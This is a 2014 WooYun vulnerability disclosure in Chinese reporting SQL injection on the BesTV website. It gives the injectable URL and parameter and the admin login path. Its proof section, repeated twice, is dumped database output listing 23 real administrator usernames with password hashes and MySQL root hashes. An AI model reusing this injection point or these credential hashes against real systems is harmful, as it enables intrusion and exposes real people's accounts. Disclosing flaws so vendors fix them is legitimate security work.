当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074448

漏洞标题:百视通主站存在SQL注入漏洞导致大量个人隐私信息泄露

相关厂商:bestv.com.cn

漏洞作者: 金枪银矛小霸王

提交时间:2014-08-31 23:17

修复时间:2014-09-05 23:18

公开时间:2014-09-05 23:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-31: 细节已通知厂商并且等待厂商处理中
2014-09-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

最后一弹,发完进军高三,少逛乌云了

详细说明:

你们起码是做视频网站的吧,怎么这么不注意网站安全
注入地址:

http://www.bestv.com.cn/index.php?m=content&c=index&a=lists&catid=27&modelid=11&platform=1

platform过滤不严导致注入发生

1.jpg


顺其自然地去找后台目录,经过10分钟的寻找,终于找到了
地址:

http://www.bestv.com.cn/phpsso_server/index.php?m=admin&c=login&a=init&forward=

就是不知道你们没有验证码是怎么登录进去发布信息的,我是做不到,不然早就拿下你的服务器了

JX8G~~GK`LBX%3EZ_OBTESA.jpg


爆出管理员账号密码,这块做得不错,都不是弱口令

web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: ottcms
Table: v9_admin
[23 entries]
+-------------+----------------------------------+
| username | password |
+-------------+----------------------------------+
| yiyangtian | 05109d1409e5fb34b41060760a32db64 |
| xieyu | 14fd496e6e316e042ae991a801563ba5 |
| feiniao520 | 151edc87afa7e4776607dd3358680055 |
| xuai | 18426f21618aff0079c636ad72ea17ba |
| miaozhen | 1fa5c0094457a8421b75513fd5ca063d |
| zhangping | 3030bc07ada123985f30332f6852a8cd |
| zhangxinyi | 34e5639c5254c9d1c6f7ef2f91eac4af |
| zhouxinyun | 44c430398e566ac99c7c73aece02b227 |
| tanghuayi | 55516c5b7cdbf67d77443019018feffe |
| wcg | 5f012be268bd4c487e68c27665e207f1 |
| pengzhong | 647af6952161d274bc01c9c6ebc11046 |
| xuyan01 | 64cf3179a8ea79d2c69d94afecbebc0d |
| chenquanlin | 6bcd36e02e8390654fb4a9bab3e2bcc4 |
| migo | 6df582c3ead12cd524028f6e73157e8d |
| zhujiaqing | 78153175c55b97c26d4f22f21da2863c |
| bestv | 970a08d9b816f5ffdfa86ae4d56d63ca |
| test | a0da6946defb8349a0e483dafcc00403 |
| kefu | a63d834315737490858a2502bce4b0b9 |
| demo | ace95e3fabec3c21a9bca3b71c3bdba9 |
| chenli | c0dd9f3b0384151c38984b9b101cd60c |
| feiniao | c9b438cf82ab0882e1631dd16ca46425 |
| huamingfeng | ef67b384a5ac202f49d5ac0b550e3f3a |
| zhouyy | f85fd95882b2d14f9ac057c19690d514 |
+-------------+----------------------------------+


爆出hash值,安全性也很好不是弱口令

web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] bestvMan [1]:
password hash: *308E0040D04740266341C7B51EA90AB5DD334B64
[*] root [2]:
password hash: *5FD5A9C4D9F6AC4BD6EF3EDCB8374DDEE02C0D4F
password hash: NULL


所以决定翻翻你们的用户信息表,恩,3W多用户信息。还挺多的(只看了下数目,没有继续往下爆破)

10.jpg


还有一个地方是微博的,应该是中奖人的信息

H@E$(Z$IL[S[RLQL6F]}3NV.jpg


OK,点到为止。

漏洞证明:

web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: ottcms
Table: v9_admin
[23 entries]
+-------------+----------------------------------+
| username | password |
+-------------+----------------------------------+
| yiyangtian | 05109d1409e5fb34b41060760a32db64 |
| xieyu | 14fd496e6e316e042ae991a801563ba5 |
| feiniao520 | 151edc87afa7e4776607dd3358680055 |
| xuai | 18426f21618aff0079c636ad72ea17ba |
| miaozhen | 1fa5c0094457a8421b75513fd5ca063d |
| zhangping | 3030bc07ada123985f30332f6852a8cd |
| zhangxinyi | 34e5639c5254c9d1c6f7ef2f91eac4af |
| zhouxinyun | 44c430398e566ac99c7c73aece02b227 |
| tanghuayi | 55516c5b7cdbf67d77443019018feffe |
| wcg | 5f012be268bd4c487e68c27665e207f1 |
| pengzhong | 647af6952161d274bc01c9c6ebc11046 |
| xuyan01 | 64cf3179a8ea79d2c69d94afecbebc0d |
| chenquanlin | 6bcd36e02e8390654fb4a9bab3e2bcc4 |
| migo | 6df582c3ead12cd524028f6e73157e8d |
| zhujiaqing | 78153175c55b97c26d4f22f21da2863c |
| bestv | 970a08d9b816f5ffdfa86ae4d56d63ca |
| test | a0da6946defb8349a0e483dafcc00403 |
| kefu | a63d834315737490858a2502bce4b0b9 |
| demo | ace95e3fabec3c21a9bca3b71c3bdba9 |
| chenli | c0dd9f3b0384151c38984b9b101cd60c |
| feiniao | c9b438cf82ab0882e1631dd16ca46425 |
| huamingfeng | ef67b384a5ac202f49d5ac0b550e3f3a |
| zhouyy | f85fd95882b2d14f9ac057c19690d514 |
+-------------+----------------------------------+


爆出hash值,安全性也很好不是弱口令

web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] bestvMan [1]:
password hash: *308E0040D04740266341C7B51EA90AB5DD334B64
[*] root [2]:
password hash: *5FD5A9C4D9F6AC4BD6EF3EDCB8374DDEE02C0D4F
password hash: NULL

修复方案:

#1 密码安全做得不错
#2 网站的整体架构还是有缺陷,列如SQLI等等
#3 当然就是对一些用户输入的数据进行过滤
#4 我写的那么辛苦不知道有没有礼物送我,求礼物吧

版权声明:转载请注明来源 金枪银矛小霸王@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-05 23:18

厂商回复:

最新状态:

暂无